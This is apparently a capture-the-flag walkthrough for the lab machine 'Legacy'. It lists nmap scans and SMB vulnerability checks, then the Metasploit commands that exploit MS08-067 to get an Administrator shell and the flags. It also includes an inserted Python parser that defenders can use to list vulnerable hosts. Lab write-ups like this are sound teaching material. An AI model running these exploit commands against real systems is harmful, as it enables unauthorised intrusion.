Ping
ping 10.10.10.4

Nmap default Scan
nmap 10.10.10.4 -oN dnmap

Script and Service Scan
nmap 10.10.10.4 -sC -sV -oN snmap

All port Scan
nmap 10.10.10.4 -sC -sV -p- --open -T5 -oN anmap

SMB Enumeration
nmap --script "smb-vuln*" --script smb-enum-shares.nse --script smb-enum-users.nse -p139,445 10.10.10.4 -oN smb_enum
The scan shows a vulnerable SMB service running on the machine.
We will try to exploit it.
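
Added example (not part of the original write-up): from the defender's side, the same kind of -oN file can be turned into a patch list. This Python code parses nmap normal-output text and returns every host where an smb-vuln-* script reported a vulnerable state. The sample scan text, the second host and the function name are constructed for illustration.

```python
import re

# Constructed sample of `nmap -oN` text (not the page's actual scan output).
SAMPLE = """\
Nmap scan report for 10.10.10.4
Host is up (0.040s latency).

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|_    Risk factor: HIGH
| smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

Nmap scan report for fileserver.example (192.0.2.15)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: LIKELY VULNERABLE
|_    Risk factor: HIGH
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
SCRIPT_RE = re.compile(r"^\|[_ ]?\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^\|[_ ]?\s*State:\s*(.+?)\s*$")


def vulnerable_findings(text):
    """Return [(host, script, state)] for each smb-vuln-* block marked vulnerable."""
    findings, host, script = [], None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
        elif m := SCRIPT_RE.match(line):
            # "false" or "ERROR: ..." on the header line means no finding follows.
            script = m.group(1) if not m.group(2).strip() else None
        elif (m := STATE_RE.match(line)) and host and script:
            state = m.group(1)
            if "VULNERABLE" in state and "NOT VULNERABLE" not in state:
                findings.append((host, script, state))
            script = None
    return findings
```

Calling vulnerable_findings(open("smb_enum").read()) on a real scan file gives the list of hosts to patch or isolate first.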
Using Metasploit
msfconsole

search ms08_067
use 0
set RHOST 10.10.10.4
set LHOST 10.10.14.7
exploit
shell
We are already Administrator, so no privilege escalation is needed.
We found user.txt on John's desktop.

We found root.txt on the Admin's desktop.

Done with Legacy…:)